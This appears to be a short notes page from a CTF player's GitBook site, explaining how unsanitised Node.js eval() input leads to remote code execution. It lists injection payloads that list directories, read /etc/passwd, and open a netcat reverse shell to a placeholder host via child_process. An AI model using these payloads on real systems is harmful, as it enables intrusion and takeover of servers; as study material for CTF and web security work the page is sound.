ad3n๐Ÿ’€kali:~$
  • ๐Ÿ HOME
    • ๐ŸšฉCTF WRITEUPS
      • CURTIN MALAYSIA CTF 2023
        • Web - General
        • Web - SQLi
        • Pwn & Reverse
      • HTB UNIVERSITY CTF 2023
        • Reverse Engineering
      • Wargames.MY 2023 CTF
        • Web
      • osu!gaming CTF 2024
        • Forensic
      • WolvCTF 2024
        • Web
      • TexSAW CTF 2024
        • Web
      • ACSC 2024 CTF
        • Web
      • NahamCon CTF 2024
        • Forensic
      • UCC CTF 2024
        • Boot2root
    • โœ๏ธNOTES
      • Web Exploitation ๐Ÿ•ธ๏ธ
  • ๐Ÿ”CATEGORIES
  • ๐Ÿ™ŒABOUT
Powered by GitBook
On this page
  • Node.js eval() to RCE
  • To be continue..
  1. HOME
  2. NOTES

Web Exploitation ๐Ÿ•ธ๏ธ

Node.js eval() to RCE

Using direct eval() can cause remote code execution if not properly validate or sanitize the input. This will lead to abuse of modules such as process, fs (file system) and child_process modules.

process.cwd()     // print current directory


require('fs').readdirSync('/app').toString()     // same as dir & ls for listing the directory


require('fs').readFileSync("/etc/passwd").toString()      // read content of the file


require("child_process").exec('nc {ip} {port} -e /bin/sh')     // rce lead to reverse shell

To be continue..

Last updated 10 months ago

๐Ÿ 
โœ๏ธ